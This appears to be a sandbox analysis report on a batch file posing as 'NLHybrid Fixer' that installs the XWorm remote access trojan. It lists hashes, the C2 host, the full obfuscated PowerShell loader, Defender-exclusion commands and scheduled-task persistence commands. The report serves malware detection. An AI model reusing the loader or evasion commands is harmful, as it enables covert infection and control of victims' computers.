Overview

overview

10

Static

static

1

NLHybrid Fixer.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    2688s
  • max time network
    2696s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-11-2024 04:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NLHybrid Fixer.bat

  • Size

    547KB

  • MD5

    ebc28de1911149c52af8585a0823f441

  • SHA1

    d8744f6982b457ec03ce0a95ac720765abd5fa35

  • SHA256

    a3b90d67811ab8ac49544ec3aa8dc427bbbc4f1342ae024127d239b301872f96

  • SHA512

    6d3285a95833a36681bf27a4678655aa4d7ee23c03eb04dc134bdc7d34f3d9e33f439094cdc19c2c40994e5a472bff88aa58138a2b3822286b0db443daab4b80

  • SSDEEP

    12288:Zb0+A5aTifEeJ0v0FVYQgokImBWFNxHHEdUSiaxiNFHCy0K/PUTTbLCDfomBi:ZI+A5xrJ0mYQKMNNC38M7zTraZ8

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

request-rapidly.gl.at.ply.gg:56303

Mutex

YN2uqOclkhFcLZBm

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    win64updater.exe

aes.plain

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+9QFC5LZZapP6GxfJwVt54Qjg4Lo+TheRHQIFkiyxyM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mqL/m1wOrCj8IjZfhLfaLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VtzvC=New-Object System.IO.MemoryStream(,$param_var); $xzRKe=New-Object System.IO.MemoryStream; $sJcxc=New-Object System.IO.Compression.GZipStream($VtzvC, [IO.Compression.CompressionMode]::Decompress); $sJcxc.CopyTo($xzRKe); $sJcxc.Dispose(); $VtzvC.Dispose(); $xzRKe.Dispose(); $xzRKe.ToArray();}function execute_function($param_var,$param2_var){ $dKqiL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pWSzp=$dKqiL.EntryPoint; $pWSzp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat';$xtBjl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($ZXShM in $xtBjl) { if ($ZXShM.StartsWith(':: ')) { $iLCed=$ZXShM.Substring(3); break; }}$payloads_var=[string[]]$iLCed.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_466_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_466.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3344
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_466.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4412
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_466.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+9QFC5LZZapP6GxfJwVt54Qjg4Lo+TheRHQIFkiyxyM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mqL/m1wOrCj8IjZfhLfaLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VtzvC=New-Object System.IO.MemoryStream(,$param_var); $xzRKe=New-Object System.IO.MemoryStream; $sJcxc=New-Object System.IO.Compression.GZipStream($VtzvC, [IO.Compression.CompressionMode]::Decompress); $sJcxc.CopyTo($xzRKe); $sJcxc.Dispose(); $VtzvC.Dispose(); $xzRKe.Dispose(); $xzRKe.ToArray();}function execute_function($param_var,$param2_var){ $dKqiL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pWSzp=$dKqiL.EntryPoint; $pWSzp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_466.bat';$xtBjl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_466.bat').Split([Environment]::NewLine);foreach ($ZXShM in $xtBjl) { if ($ZXShM.StartsWith(':: ')) { $iLCed=$ZXShM.Substring(3); break; }}$payloads_var=[string[]]$iLCed.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1684
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2852
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mGYKXCZlRuJh42Y2Yoc5QSU2PMidG1imVsUZKs3e9hA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Oqpzdu0Suhfqr1jOik9RNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oHhqo=New-Object System.IO.MemoryStream(,$param_var); $OyOSA=New-Object System.IO.MemoryStream; $DFWli=New-Object System.IO.Compression.GZipStream($oHhqo, [IO.Compression.CompressionMode]::Decompress); $DFWli.CopyTo($OyOSA); $DFWli.Dispose(); $oHhqo.Dispose(); $OyOSA.Dispose(); $OyOSA.ToArray();}function execute_function($param_var,$param2_var){ $hdzDI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KNEkV=$hdzDI.EntryPoint; $KNEkV.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat';$HYMcU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat').Split([Environment]::NewLine);foreach ($ZMkGT in $HYMcU) { if ($ZMkGT.StartsWith(':: ')) { $TFYgT=$ZMkGT.Substring(3); break; }}$payloads_var=[string[]]$TFYgT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2780
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_645_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_645.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5476
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_645.vbs"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5888
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_645.bat" "
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3144
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mGYKXCZlRuJh42Y2Yoc5QSU2PMidG1imVsUZKs3e9hA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Oqpzdu0Suhfqr1jOik9RNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oHhqo=New-Object System.IO.MemoryStream(,$param_var); $OyOSA=New-Object System.IO.MemoryStream; $DFWli=New-Object System.IO.Compression.GZipStream($oHhqo, [IO.Compression.CompressionMode]::Decompress); $DFWli.CopyTo($OyOSA); $DFWli.Dispose(); $oHhqo.Dispose(); $OyOSA.Dispose(); $OyOSA.ToArray();}function execute_function($param_var,$param2_var){ $hdzDI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KNEkV=$hdzDI.EntryPoint; $KNEkV.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_645.bat';$HYMcU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_645.bat').Split([Environment]::NewLine);foreach ($ZMkGT in $HYMcU) { if ($ZMkGT.StartsWith(':: ')) { $TFYgT=$ZMkGT.Substring(3); break; }}$payloads_var=[string[]]$TFYgT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:1540
                      • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.exe
                        "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.exe"
                        11⤵
                        • Executes dropped EXE
                        PID:5880
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3024
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1028
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:888
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1840
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "win64updater" /tr "C:\Users\Admin\win64updater.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3092
  • C:\Users\Admin\win64updater.exe
    C:\Users\Admin\win64updater.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3124
  • C:\Users\Admin\win64updater.exe
    C:\Users\Admin\win64updater.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:5020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\win64updater.exe.log
    Filesize

    2KB

    MD5

    627073ee3ca9676911bee35548eff2b8

    SHA1

    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

    SHA256

    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

    SHA512

    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    62KB

    MD5

    e566632d8956997225be604d026c9b39

    SHA1

    94a9aade75fffc63ed71404b630eca41d3ce130e

    SHA256

    b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

    SHA512

    f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
    Filesize

    1KB

    MD5

    c81d47c3b95d180e012e8380740c4349

    SHA1

    702eded5bde64ab869985b0934655e18dbdc6a70

    SHA256

    cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc

    SHA512

    982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    4093e5ab3812960039eba1a814c2ffb0

    SHA1

    b5e4a98a80be72fccd3cc910e93113d2febef298

    SHA256

    c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c

    SHA512

    f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    781da0576417bf414dc558e5a315e2be

    SHA1

    215451c1e370be595f1c389f587efeaa93108b4c

    SHA256

    41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

    SHA512

    24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    4ca42e9cc6de90060a4503debda3ea58

    SHA1

    652f325e5c423876d85ba1a164301ab2d147604b

    SHA256

    67b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c

    SHA512

    38303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    eb15ee5741b379245ca8549cb0d4ecf8

    SHA1

    3555273945abda3402674aea7a4bff65eb71a783

    SHA256

    b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

    SHA512

    1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    2e8eb51096d6f6781456fef7df731d97

    SHA1

    ec2aaf851a618fb43c3d040a13a71997c25bda43

    SHA256

    96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

    SHA512

    0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat
    Filesize

    291KB

    MD5

    9f26640e4d15dfd331c08d3e6a9248a1

    SHA1

    2bb18d691b01e9824af1c3539bfefa7d364c16eb

    SHA256

    d74abdf76bc9e69fee222f2314147c7ebe888181b6820ce551af77542fe3dab6

    SHA512

    5da7a67c5fa7ed7a231e9412b6c7f704486863ca7ba4e8325425a0ebaaa023c41af4b1ca5cf6d2e84c4f7634e3f2c52a8265e35a9c48cd10c039c689ae8f1f60

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.exe
    Filesize

    42KB

    MD5

    8b21fb92607aca8f4ac65b7847de3ec5

    SHA1

    52e81900805a878a057942687b1ad56ff0d514b3

    SHA256

    852ef505e8e0e9e0d7d2779bcbdaa93bfedd4689d03a8b43fe7e50b82e8665ca

    SHA512

    3514308891d5357648fffd1a8f001c25ecb4af1dcb1203fbabcdfd97795fc192d00d58f09c756286e33eb59f96ca73fc878efc392164691a91dd21bfdbc10e9a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xysls1md.2ca.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_466.bat
    Filesize

    547KB

    MD5

    ebc28de1911149c52af8585a0823f441

    SHA1

    d8744f6982b457ec03ce0a95ac720765abd5fa35

    SHA256

    a3b90d67811ab8ac49544ec3aa8dc427bbbc4f1342ae024127d239b301872f96

    SHA512

    6d3285a95833a36681bf27a4678655aa4d7ee23c03eb04dc134bdc7d34f3d9e33f439094cdc19c2c40994e5a472bff88aa58138a2b3822286b0db443daab4b80

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_466.vbs
    Filesize

    115B

    MD5

    60b4cfe2454ce1037eefc0d8f4fbdaab

    SHA1

    aeaed5aa93c42d29fb127cf44cfb1158e151a2c8

    SHA256

    fb048fa7508e52b6e138b36bc0c2a7a87d0527d50e4a8e33c3a3e39d48be2278

    SHA512

    0a7e5406ab7f998cf7f6a96537bf485f1682ccacdb99ace19ff083d549925456c98d3c9636608cc2135eddaabb33b3578941fc8e4cdebcccf687b39f7c46e3cf

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_645.vbs
    Filesize

    115B

    MD5

    b633c0915aa0abbf456ba9039d58447c

    SHA1

    30a90fe5f25e24e72c3311ec480ee060ffaf9993

    SHA256

    20bd4efa6e12c34c9ff20f00cf69768ba59db3f7e50c233a8b1da59bfb176a31

    SHA512

    7f1edc5ab1f468f5353c09c7220e225d446a1143488c420fd60a8535bcb5eabf46f011164642e11cd48311b13b00706b8d87f0f4b519c1d544fb3b6ea46eac4e

    Download Submit

  • C:\Users\Admin\win64updater.exe
    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

    Download Submit

  • memory/1684-50-0x0000019058060000-0x0000019058070000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2780-63-0x000002B621FF0000-0x000002B62202E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/2780-62-0x000002B621FE0000-0x000002B621FE8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2800-14-0x000001EEFAEF0000-0x000001EEFAF6E000-memory.dmp

    Filesize

    504KB

    Download

  • memory/2800-73-0x00007FFB11B53000-0x00007FFB11B55000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2800-74-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-13-0x000001EEFAEE0000-0x000001EEFAEE8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2800-0-0x00007FFB11B53000-0x00007FFB11B55000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2800-1-0x000001EEFAC50000-0x000001EEFAC72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2800-10-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-11-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2800-12-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3124-160-0x0000020F6D4F0000-0x0000020F6D536000-memory.dmp

    Filesize

    280KB

    Download

  • memory/3344-21-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3344-27-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3344-25-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3344-26-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3344-30-0x00007FFB11B50000-0x00007FFB12612000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5880-148-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

    Filesize

    64KB

    Download